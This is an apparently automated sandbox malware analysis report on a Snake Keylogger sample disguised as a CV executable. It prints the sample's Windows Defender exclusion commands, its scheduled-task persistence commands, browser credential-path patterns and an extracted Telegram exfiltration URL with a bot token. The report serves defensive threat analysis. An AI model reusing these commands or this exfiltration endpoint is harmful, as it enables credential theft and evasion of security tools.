Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kayla Dennis CV.exe

Overview

General Information

Sample name:Kayla Dennis CV.exe
Analysis ID:1557909
MD5:8f6d690e119684b1629d41f97b83fb23
SHA1:46efdb7ae7079a781723d75e390431aa4c6080e5
SHA256:c997ad9cac5cb1cfc050a066e275aae6a540443075b2641ca19331b3f065ee29
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Kayla Dennis CV.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\Kayla Dennis CV.exe" MD5: 8F6D690E119684B1629D41F97B83FB23)
    • powershell.exe (PID: 4688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7516 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7184 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • lyKbfEsVYfQfU.exe (PID: 7428 cmdline: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe MD5: 8F6D690E119684B1629D41F97B83FB23)
    • schtasks.exe (PID: 7680 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk/sendMessage?chat_id=6246770128", "Token": "7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk", "Chat_id": "6246770128\n", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x14af3:$a1: get_encryptedPassword
          • 0x14ddf:$a2: get_encryptedUsername
          • 0x148ef:$a3: get_timePasswordChanged
          • 0x149ea:$a4: get_passwordField
          • 0x14b09:$a5: set_encryptedPassword
          • 0x16187:$a7: get_logins
          • 0x160ea:$a10: KeyLoggerEventArgs
          • 0x15d55:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 19 entries
          SourceRuleDescriptionAuthorStrings
          11.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            11.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              11.2.RegSvcs.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                11.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x14cf3:$a1: get_encryptedPassword
                • 0x14fdf:$a2: get_encryptedUsername
                • 0x14aef:$a3: get_timePasswordChanged
                • 0x14bea:$a4: get_passwordField
                • 0x14d09:$a5: set_encryptedPassword
                • 0x16387:$a7: get_logins
                • 0x162ea:$a10: KeyLoggerEventArgs
                • 0x15f55:$a11: KeyLoggerEventArgsEventHandler
                11.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1c712:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x1b944:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x1bd77:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1cdb6:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 26 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", ProcessId: 4688, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", ProcessId: 4688, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe, ParentImage: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe, ParentProcessId: 7428, ParentProcessName: lyKbfEsVYfQfU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp", ProcessId: 7680, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", ProcessId: 7184, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe", ProcessId: 4688, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Kayla Dennis CV.exe", ParentImage: C:\Users\user\Desktop\Kayla Dennis CV.exe, ParentProcessId: 6300, ParentProcessName: Kayla Dennis CV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp", ProcessId: 7184, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T18:21:23.022502+010028033053Unknown Traffic192.168.2.549713188.114.96.3443TCP
                2024-11-18T18:21:25.078851+010028033053Unknown Traffic192.168.2.549715188.114.96.3443TCP
                2024-11-18T18:21:30.399933+010028033053Unknown Traffic192.168.2.549726188.114.96.3443TCP
                2024-11-18T18:21:31.488065+010028033053Unknown Traffic192.168.2.549731188.114.96.3443TCP
                2024-11-18T18:21:32.219380+010028033053Unknown Traffic192.168.2.549732188.114.96.3443TCP
                2024-11-18T18:21:33.557836+010028033053Unknown Traffic192.168.2.549741188.114.96.3443TCP
                2024-11-18T18:21:38.783324+010028033053Unknown Traffic192.168.2.549773188.114.96.3443TCP
                2024-11-18T18:21:42.417169+010028033053Unknown Traffic192.168.2.549796188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T18:21:20.928058+010028032742Potentially Bad Traffic192.168.2.549711132.226.247.7380TCP
                2024-11-18T18:21:22.239368+010028032742Potentially Bad Traffic192.168.2.549711132.226.247.7380TCP
                2024-11-18T18:21:23.958124+010028032742Potentially Bad Traffic192.168.2.549714132.226.247.7380TCP
                2024-11-18T18:21:29.473739+010028032742Potentially Bad Traffic192.168.2.549721132.226.247.7380TCP
                2024-11-18T18:21:30.724304+010028032742Potentially Bad Traffic192.168.2.549721132.226.247.7380TCP
                2024-11-18T18:21:32.520608+010028032742Potentially Bad Traffic192.168.2.549733132.226.247.7380TCP
                2024-11-18T18:21:34.520631+010028032742Potentially Bad Traffic192.168.2.549748132.226.247.7380TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk/sendMessage?chat_id=6246770128", "Token": "7253575935:AAEoCGpTh1d2VtErBVh5tHQuO4O_SZJWbQk", "Chat_id": "6246770128\n", "Version": "5.1"}
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeReversingLabs: Detection: 29%
                Source: Kayla Dennis CV.exeReversingLabs: Detection: 29%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeJoe Sandbox ML: detected
                Source: Kayla Dennis CV.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Kayla Dennis CV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0
                Source: Kayla Dennis CV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp
                Source: C:\Users\user\Desktop\Kayla Dennis CV.exeCode function: 4x nop then jmp 0B1D0BD6h0_2_0B1D046F
                Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exeCode function: 4x nop then jmp 0799FCC6h12_2_0799F55F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05632819h17_2_05632568
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05633640h17_2_0563356E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563D801h17_2_0563D558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05631F59h17_2_05631CA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563F211h17_2_0563EF68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563E0B1h17_2_0563DE08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563E961h17_2_0563E6B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563D3A9h17_2_0563D100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 056323B9h17_2_05632108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05633640h17_2_056331F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05632C79h17_2_056329C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563DC59h17_2_0563D9B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h17_2_05630040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05631AF9h17_2_05631848
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563FAC1h17_2_0563F818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05630D0Eh17_2_05630B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05631698h17_2_05630B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563EDB9h17_2_0563EB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563F669h17_2_0563F3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0563E509h17_2_0563E260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05633640h17_2_05633228

                Networking

                barindex
                Source: Yara matchFile source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49714 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49748 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49715 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49726 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49773 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49741 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49796 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
